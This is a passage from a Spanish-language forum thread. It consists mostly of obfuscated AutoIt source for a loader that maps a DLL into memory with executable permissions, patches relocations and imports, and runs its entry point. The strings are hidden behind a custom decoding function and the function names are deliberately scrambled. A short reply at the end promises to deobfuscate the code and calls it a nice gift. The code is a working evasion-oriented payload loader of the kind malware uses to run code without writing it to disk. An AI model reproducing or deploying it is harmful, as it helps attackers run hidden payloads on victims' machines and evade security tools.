LOCAL $POPTIONALHEADERIMAGEBASE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("piklccodxnprxusmndogiunpucofod","-39,4,-10,-5,2,-33,-14,15,-19"))
$PPOINTER+=8
LOCAL $TIMAGE_DIRECTORY_ENTRY_IMPORT=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("rohrkgdmncfrxlmcewguxyjlhjcbyb","-14,8,7,0,-7,-71,-14,-4,4,17,15,-17,-12,-43,-9,1,13,-18,12,-2,-61,-89,-6,11,7,8,1,-66,-38,7,8,-10"),$PPOINTER)
LOCAL $PADDRESSIMPORT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_IMPORT,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
LOCAL $ISIZEIMPORT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_IMPORT,STRINGDEC("htimftjivdahmcggkgdubendfivfhq","-21,-11,17,-8"))
$PPOINTER+=8
$PPOINTER+=24
LOCAL $TIMAGE_DIRECTORY_ENTRY_BASERELOC=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("rohrkgdmncfrxlmcewguxyjlhjcbyb","-14,8,7,0,-7,-71,-14,-4,4,17,15,-17,-12,-43,-9,1,13,-18,12,-2,-61,-89,-6,11,7,8,1,-66,-38,7,8,-10"),$PPOINTER)
LOCAL $PADDRESSNEWBASERELOC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_BASERELOC,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
LOCAL $ISIZEBASERELOC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_BASERELOC,STRINGDEC("htimftjivdahmcggkgdubendfivfhq","-21,-11,17,-8"))
$PPOINTER+=8
$PPOINTER+=40
$PPOINTER+=40
LOCAL $PBASEADDRESS=0
LOCAL $BCLEANLOAD=$HOOKEXPLOITKERNELBYPASSROOTEXPLOIT($PBASEADDRESS)
$PBASEADDRESS=$BYPASSKERNELROOTADMINISTRATION($PBASEADDRESS,$ISIZEOFIMAGE,$MEM_RESERVE+$MEM_COMMIT,$PAGE_READWRITE)
LOCAL $PHEADERSNEW=$HOOKROOTKERNELROOTHOOK($TIMAGE_DOS_HEADER)
LOCAL $IOPTIONALHEADERSIZEOFHEADERS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("uajndgscxoaqvmpmlewkyvswvbncum","-34,8,16,-9,-21,-1,-43,2,-23,-11,4,1,-3"))
$BYPASSADMINISTRATIONEXPLOITBYPASS($PBASEADDRESS,$IOPTIONALHEADERSIZEOFHEADERS,$PAGE_READWRITE)
IF @ERROR THEN
$KERNELROOTROOTKERNELKERNEL($PBASEADDRESS)
RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(6,0,0)
ENDIF
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IOPTIONALHEADERSIZEOFHEADERS&"]",$PBASEADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IOPTIONALHEADERSIZEOFHEADERS&"]",$PHEADERSNEW),1))
LOCAL $TIMAGE_SECTION_HEADER
LOCAL $ISIZEOFRAWDATA,$PPOINTERTORAWDATA
LOCAL $IVIRTUALSIZE,$IVIRTUALADDRESS
LOCAL $TIMPRAW,$TRELOCRAW
FOR $I=1 TO $INUMBEROFSECTIONS
$TIMAGE_SECTION_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("mojpoyssdxtpuzqpcnsiwelefhzgya","-10,-7,-9,2,-79,-43,-18,-6,1,-29,-60,-19,-58")&STRINGDEC("vbldanmbhcsltynkaortgbgkjuimps","-18,21,3,14,3,-78,-23,7,10,17,2,-11,-8,-38,-5,15,4,-52")&STRINGDEC("kkvvvluofzqkzuepcoybcytubbiggv","-7,12,-7,-4,-18,-76,-31,-6,12,-6,4,-10,-14,-52,-1,-12,15,-10,-6,17,-40")&STRINGDEC("qetrjgnlxlvegjkdznybdrcuijzsol","-13,18,-5,0,-6,-71,-27,-3,2,-7,-39,1,-21,-9,12,-32,-25,6,-24,-39")&STRINGDEC("blvsrzcrailshptfaqyyeetseetdbz","2,11,-7,-1,-14,-90,-19,-3,8,5,8,-14,10,-28,-5,-20,0,6,-53,-24,15,-4,-57")&STRINGDEC("tqkctmpbsvhhkdkgmqnibxhpkatykb","-16,6,4,15,-16,-77,-32,13,-10,-8,12,-3,7,-16,4,-21,-8,-5,1,-6,-1,-4,1,-1,3,18,-57")&STRINGDEC("nhnevjsryrvozfdrhezcxeomkkmhus","-10,15,1,13,-18,-74,-35,-3,-16,-4,-2,-10,-8,-18,11,-38,1,9,-21,11,-3,8,-13,-8,7,8,-50")&STRINGDEC("rqejsmymxcjnxkzbsbxujapidccihv","5,-2,13,-6,-83,-31,-4,0,-22,2,8,-31,-18,-25,-21,10,-4,1,-23,-1,-1,14,-2,10,-41")&STRINGDEC("sgnndtmmzqymlnyidyqlpxkocogaza","4,8,4,-10,-68,-38,8,0,-24,-12,-7,-30,-6,-34,-16,5,1,-11,4,1,-14,-19,7,4,-40")&STRINGDEC("hupkjmgzcrxevtxtowwoteiqwftdex","-4,2,-1,7,-6,-77,-36,-18,-2,0,-23,-2,-2,-15,-6,-11,4,-3,-14,-12,-1"),$PPOINTER)
$ISIZEOFRAWDATA=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("lohkljtmkwobrarxhbfwcbacdanqnx","-25,-6,18,-6,-29,-4,-34,-12,12,-51,-14,18,-17"))
$PPOINTERTORAWDATA=$PHEADERSNEW+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("xttkphmeylgmqkmwftqcvvtehxhceq","-40,-5,-11,3,4,-3,5,-17,-10,-26,-6,10,-45,-10,7,-22"))
$IVIRTUALADDRESS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
$IVIRTUALSIZE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("bolwjztsooyqtkwojkfjcewunjrbrl","-12,-6,6,-3,11,-25,-8,-32,-6,11,-20"))
IF $IVIRTUALSIZE AND $IVIRTUALSIZE<$ISIZEOFRAWDATA THEN $ISIZEOFRAWDATA=$IVIRTUALSIZE
$BYPASSADMINISTRATIONEXPLOITBYPASS($PBASEADDRESS+$IVIRTUALADDRESS,$IVIRTUALSIZE,$PAGE_EXECUTE_READWRITE)
IF @ERROR THEN
$PPOINTER+=40
CONTINUELOOP
ENDIF
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IVIRTUALSIZE&"]",$PBASEADDRESS+$IVIRTUALADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IVIRTUALSIZE&"]"),1))
IF $ISIZEOFRAWDATA THEN
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEOFRAWDATA&"]",$PBASEADDRESS+$IVIRTUALADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEOFRAWDATA&"]",$PPOINTERTORAWDATA),1))
ENDIF
IF $IVIRTUALADDRESS<=$PADDRESSIMPORT AND $IVIRTUALADDRESS+$ISIZEOFRAWDATA>$PADDRESSIMPORT THEN
$TIMPRAW=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEIMPORT&"]",$PPOINTERTORAWDATA+($PADDRESSIMPORT-$IVIRTUALADDRESS))
$BYPASSKERNELEXPLOITKERNEL($TIMPRAW,$PBASEADDRESS)
ENDIF
IF $IVIRTUALADDRESS<=$PADDRESSNEWBASERELOC AND $IVIRTUALADDRESS+$ISIZEOFRAWDATA>$PADDRESSNEWBASERELOC THEN
$TRELOCRAW=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEBASERELOC&"]",$PPOINTERTORAWDATA+($PADDRESSNEWBASERELOC-$IVIRTUALADDRESS))
ENDIF
$PPOINTER+=40
NEXT
IF $PADDRESSNEWBASERELOC AND $ISIZEBASERELOC THEN $ADMINISTRATIONKERNELBYPASSROOTROOTADMINISTRATION($TRELOCRAW,$PBASEADDRESS,$POPTIONALHEADERIMAGEBASE,$IMAGIC=523)
LOCAL $PENTRYFUNC=$PBASEADDRESS+$IENTRYPOINT
IF $IENTRYPOINT THEN $ADMINISTRATIONADMINISTRATIONBYPASSHOOK(STRINGDEC("bgerenbiyscuvxftpthytojojwggvx","0,8,10,-6"),$PENTRYFUNC,STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PBASEADDRESS,STRINGDEC("fjmrgpoktxdxalfupypesalaixldpw","-2,13,2,0,-3"),1,STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),0)
IF $BCLEANLOAD THEN $KERNELEXPLOITADMINISTRATIONROOTBYPASSADMINISTRATION($PBASEADDRESS)
ENDFUNC
FUNC FIXRELOC($TDATA,$PADDRESSNEW,$PADDRESSOLD,$FIMAGEX64)
LOCAL $IDELTA=$PADDRESSNEW-$PADDRESSOLD
LOCAL $ISIZE=$KERNELROOTKERNELHOOKKERNELROOT($TDATA)
LOCAL $PDATA=$HOOKROOTKERNELROOTHOOK($TDATA)
LOCAL $TIMAGE_BASE_RELOCATION,$IRELATIVEMOVE
LOCAL $IVIRTUALADDRESS,$ISIZEOFBLOCK,$INUMBEROFENTRIES
LOCAL $TENRIES,$IDATA,$TADDRESS
LOCAL $IFLAG=3+7*$FIMAGEX64
WHILE $IRELATIVEMOVE<$ISIZE
$TIMAGE_BASE_RELOCATION=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("lwjrdmzzfbhfvidpgcrfuusyhqgqwo","-8,0,5,0,0,-77,-36,-17,12,18,13,-5,-10,-40,0,-12,11,2,1,13,-58,-85,-15,-2,7,1,-3,-81,-36,-6,14,-18,-27,-12,-34,-1,-11,-23,5"),$PDATA+$IRELATIVEMOVE)
$IVIRTUALADDRESS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_BASE_RELOCATION,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
$ISIZEOFBLOCK=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_BASE_RELOCATION,STRINGDEC("bnuwrciljwllofmmhxrxtcxcwgidkq","-15,-5,5,-18,-35,3,-39,0,5,-20,-1"))
$INUMBEROFENTRIES=($ISIZEOFBLOCK-8)/2
$TENRIES=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ljdrmcjigcsrmjeayaoxiftpaygyrv","11,5,14,-14,-18")&$INUMBEROFENTRIES&"]",$HOOKROOTKERNELROOTHOOK($TIMAGE_BASE_RELOCATION)+8)
FOR $I=1 TO $INUMBEROFENTRIES
$IDATA=$KERNELBYPASSROOTADMINISTRATION($TENRIES,1,$I)
IF $ROOTBYPASSADMINISTRATIONADMINISTRATION($IDATA,12)=$IFLAG THEN
$TADDRESS=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESSNEW+$IVIRTUALADDRESS+$BYPASSBYPASSHOOKEXPLOIT($IDATA,4095))
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($TADDRESS,1,$KERNELBYPASSROOTADMINISTRATION($TADDRESS,1)+$IDELTA)
ENDIF
NEXT
$IRELATIVEMOVE+=$ISIZEOFBLOCK
WEND
RETURN 1
ENDFUNC
FUNC FIXIMPORTS($TDATA,$HINSTANCE)
LOCAL $PIMPORTDIRECTORY=$HOOKROOTKERNELROOTHOOK($TDATA)
LOCAL $HMODULE,$PFUNCNAME,$TFUNCNAME,$SFUNCNAME,$PFUNCADDRESS
LOCAL $TIMAGE_IMPORT_MODULE_DIRECTORY,$PMODULENAME,$TMODULENAME
LOCAL $TBUFFEROFFSET2,$IBUFFEROFFSET2
LOCAL $IINITIALOFFSET,$IINITIALOFFSET2,$IOFFSET
LOCAL CONST $IPTRSIZE=$KERNELROOTKERNELHOOKKERNELROOT($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4")))
WHILE 1
$TIMAGE_IMPORT_MODULE_DIRECTORY=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("oslxljafhlcqevhnveycpapujzmbxp","-11,4,3,-6,-8,-74,-15,-16,-39,-29,15,-8,2,-13,6,-13,-10,-31,-16,15,3,19,-28,-13,11,-12,-2,-39")&STRINGDEC("fgdaygtgtzkeiogftjplkmhulfitfm","-2,16,11,17,-21,-71,-32,2,-7,-21,-39,-4,11,-10,-20,14,-19,3,0,-49")&STRINGDEC("dhbrrjgfaqtelpmlwzkkhrxzhyhysq","0,15,13,0,-14,-74,-33,9,17,6,-19,13,-8,-11,5,-41,-15,-25,-2,3,-45")&STRINGDEC("dilcwosqkyuaqkznzozwybrpzcyodc","0,14,3,15,-19,-79,-33,-27,-42,-44,-6,3,4,1,-21,-32,-25,-2,-21,-60")&STRINGDEC("usmbngezbsbjfvccnqokanpjizqujz","-17,4,2,16,-10,-71,-19,-36,-33,-45,7,8,13,-2,-15,5,7,-3,-4"),$PIMPORTDIRECTORY)
IF NOT $KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("hexycwgtfbcwsreqoojrsmjddzzoxj","-22,-15,-55,-51,6,-5,12,0,-18,6,18,-9,-8"))THEN EXITLOOP
$PMODULENAME=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("uantbqllttuevibcqdtrmnwucvxdfb","-35,-11,-45,-39,13,-13,9,0,-15,-38,-20,8,-17"))
$TMODULENAME=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("upjquvutslafzbgfjxkhknbxlzazrp","-18,-8,-9,1,-85,-40,-20,-7,-14,-17")&$ROOTKERNELROOTROOTADMINISTRATIONBYPASS($PMODULENAME)&"]",$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("uantbqllttuevibcqdtrmnwucvxdfb","-35,-11,-45,-39,13,-13,9,0,-15,-38,-20,8,-17")))
$HMODULE=$BYPASSEXPLOITEXPLOITROOTEXPLOITBYPASS($KERNELBYPASSROOTADMINISTRATION($TMODULENAME,STRINGDEC("ocmqkssqolnvxuhrhmkzgjdofxgnvv","-33,-2,0,-12")))
$IINITIALOFFSET=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("hexycwgtfbcwsreqoojrsmjddzzoxj","-22,-15,-55,-51,6,-5,12,0,-18,6,18,-9,-8"))
$IINITIALOFFSET2=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("zfbhtwtfudtxfnayqiivdgxbknheos","-40,-16,-33,-25,-2,-14,-13,3,-7,-3,-8,-50,3,4,18,-5,-29,-1,12,-8,7"))
IF $IINITIALOFFSET2=$HINSTANCE THEN $IINITIALOFFSET2=$IINITIALOFFSET
$IOFFSET=0
WHILE 1
$TBUFFEROFFSET2=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$IINITIALOFFSET2+$IOFFSET)
$IBUFFEROFFSET2=$KERNELBYPASSROOTADMINISTRATION($TBUFFEROFFSET2,1)
IF NOT $IBUFFEROFFSET2 THEN EXITLOOP
IF $ROOTBYPASSADMINISTRATIONADMINISTRATION($KERNELEXPLOITADMINISTRATIONROOTROOT($IBUFFEROFFSET2,$IPTRSIZE,1),7)THEN
$PFUNCADDRESS=$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL($HMODULE,$BYPASSBYPASSHOOKEXPLOIT($IBUFFEROFFSET2,65535))
ELSE
$PFUNCNAME=$HINSTANCE+$IBUFFEROFFSET2+2
$TFUNCNAME=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ztupaktkcocqtjwswsimusgwiiaevm","-3,-5,-3,-12,-65,-28,-2,-7,6,-1,-2,-5,-57,-74,-20,-11,-22,-1,-73,-31,-20,-6,-2,-28")&$ROOTKERNELROOTROOTADMINISTRATIONBYPASS($PFUNCNAME)&"]",$HINSTANCE+$IBUFFEROFFSET2)
$SFUNCNAME=$KERNELBYPASSROOTADMINISTRATION($TFUNCNAME,STRINGDEC("ocmqkssqolnvxuhrhmkzgjdofxgnvv","-33,-2,0,-12"))
$PFUNCADDRESS=$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL($HMODULE,$SFUNCNAME)
ENDIF
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$IINITIALOFFSET+$IOFFSET),1,$PFUNCADDRESS)
$IOFFSET+=$IPTRSIZE
WEND
$PIMPORTDIRECTORY+=20
WEND
RETURN 1
ENDFUNC
FUNC UNMAPVIEWOFSECTION($PADDRESS)
LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("lolaswlneqglatvujvwqviroebtdfh","2,5,-8,11,-7,-73,-8,-2,7"),STRINGDEC("pzsmwgeaptrhqhifwxjgngsprkjntw","-7,-12,1"),STRINGDEC("egwadzchaebonrunjtdzissolfqgmo","-23,13,-34,13,9,-25,13,-18,8,0,21,-32,-8,-31,-16,-11,10,-11,11,-12"),STRINGDEC("wvyhizikrnukotjwuqbnvlyvoqlxdb","-15,-21,-11,-4,3,-21"),$BYPASSHOOKHOOKHOOKKERNELHOOK(),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESS)
IF @ERROR OR $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,FALSE )
RETURN TRUE
ENDFUNC
FUNC VIRTUALPROTECT($PADDRESS,$ISIZE,$IPROTECTION)
LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("gisqrnanonrphwezrnlerrcpslnegz","4,-4,-1,-3,-13,-2,-46,-60,-65,-10,-6,-4"),STRINGDEC("bgerenbiyscuvxftpthytojojwggvx","0,8,10,-6"),STRINGDEC("wpxbildbjcxtjlduknwzcanprgheeu","-33,-7,-6,18,12,-11,8,-18,8,12,-4,-15,-7,8"),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESS,STRINGDEC("qquzgqwwlawbxandwwcglmgrcbifhj","-13,6,-6,-8,-3,-18,-7,-3,6"),$ISIZE,STRINGDEC("fjmrgpoktxdxalfupypesalaixldpw","-2,13,2,0,-3"),$IPROTECTION,STRINGDEC("nnpgmnrtuodmqfsmzcfvlmzjmztrro","-10,9,-1,11,-9,-68"),0)
IF @ERROR OR NOT $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
RETURN 1
ENDFUNC
FUNC GETPROCADDRESS($HMODULE,$VNAME)
LOCAL $STYPE=STRINGDEC("zdacatdoylubvdmymbssbhfdsgsgol","-7,16,17")
IF $EXPLOITEXPLOITKERNELHOOKKERNELBYPASS($VNAME)THEN $STYPE=STRINGDEC("rygvobzahsfsgyffoyrxsigagjtisp","5,-10,11,-18")
LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("gisqrnanonrphwezrnlerrcpslnegz","4,-4,-1,-3,-13,-2,-46,-60,-65,-10,-6,-4"),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),STRINGDEC("ejkuftmguocuyhwozahfcvigcwnibd","-30,-5,9,-37,12,-5,-10,-38,-17,-11,15,-16,-6,11"),STRINGDEC("wvyhizikrnukotjwuqbnvlyvoqlxdb","-15,-21,-11,-4,3,-21"),$HMODULE,$STYPE,$VNAME)
IF @ERROR OR NOT $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
RETURN $ACALL[0]
ENDFUNC
FUNC STRINGDEC($STRING,$PARAM)
$STRING=STRINGTOASCIIARRAY($STRING)
$PARAM=STRINGSPLIT($PARAM,",",2)
$COUNT=0
$RETURN=""
FOR $I=0 TO UBOUND($PARAM)-1
$CHAR=$PARAM[$I]
$COMPARE=$STRING[$COUNT]
$RETURN&=CHRW($CHAR+$COMPARE)
IF $COUNT=UBOUND($STRING)-1 THEN
$COUNT=0
ELSE
$COUNT=$COUNT+1
ENDIF
NEXT
RETURN $RETURN
ENDFUNC
las string estan ofuscadas pero igualmente no debería afectar al funcionamiento del programa. eso creo..
 #493181  por Scorpio
 05 Ene 2018, 01:54
Es tarde, mañana intentare desofuscar para ver esto mejor. Si es lo que dices bonito regalo traes.

EDIT: Aqui lo teneis un poco mas limpio, falta desofuscar las Strings. Por lo que veo creo que solo funciona con DLL (x32/x64) y no ejecutables, aun asi aún no lo he probado, ando cansado... Otro dia sigo. :drinking:

//Regards.